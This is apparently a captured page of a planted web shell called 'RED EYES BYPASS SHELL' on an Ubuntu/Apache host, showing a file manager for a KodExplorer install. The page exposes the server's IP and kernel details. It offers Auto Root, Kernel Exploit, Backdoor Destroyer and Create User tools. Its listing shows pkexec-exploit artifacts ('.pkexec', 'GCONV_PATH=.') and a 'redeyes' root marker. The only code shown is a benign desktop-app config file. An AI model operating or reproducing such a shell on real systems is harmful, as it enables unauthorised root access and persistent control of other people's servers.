Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
vendor /
admin /
app /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
api
[ DIR ]
drwxr-xr-x
controller
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
function
[ DIR ]
drwxr-xr-x
kod
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
sdks
[ DIR ]
drwxr-xr-x
template
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
desktop_app.php
1.63
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : desktop_app.php
<?php $desktopApps = array( 'my_computer' => array( "type" => "app", "content" => "core.explorer('','".LNG('my_computer')."');", "icon" => STATIC_PATH."images/file_icon/icon_others/computer.png", "name" => LNG('my_computer'), "menuType" => "systemBox menu-default", "ext" => 'oexe', "path" => "", "resize" => 1 ), 'recycle' => array( "type" => "app", "content" => "core.explorer('".KOD_USER_RECYCLE."','".LNG('recycle')."');", "icon" => STATIC_PATH."images/file_icon/icon_others/recycle.png", "name" => LNG('recycle'), "menuType" => "systemBox menu-recycle-button", "ext" => 'oexe', "path" => "", "resize" => 1 ), 'PluginCenter' => array( "type" => "app", "content" => "core.openWindowBig('./index.php?pluginApp/index','".LNG('PluginCenter')."');", "icon" => STATIC_PATH."images/file_icon/icon_others/plugins.png", "name" => LNG('PluginCenter'), "menuType" => "systemBox menu-default", "ext" => 'oexe', "path" => "", "resize" => 1 ), 'setting' => array( "type" => "app", "content" => "core.setting();", "icon" => STATIC_PATH."images/file_icon/icon_others/setting.png", "name" => LNG('setting'), "menuType" => "systemBox menu-default", "ext" => 'oexe', "path" => "/", "resize" => 1 ), 'appStore' => array( "type" => "app", "content" => "core.appStore();", "icon" => STATIC_PATH."images/file_icon/icon_others/appStore.png", "name" => LNG('app_store'), "menuType" => "systemBox menu-default", "ext" => 'oexe', "path" => "", "resize" => 1 ) ); //管理员插件中心 if(!$GLOBALS['isRoot']){ unset($desktopApps['PluginCenter']); } return $desktopApps;
Close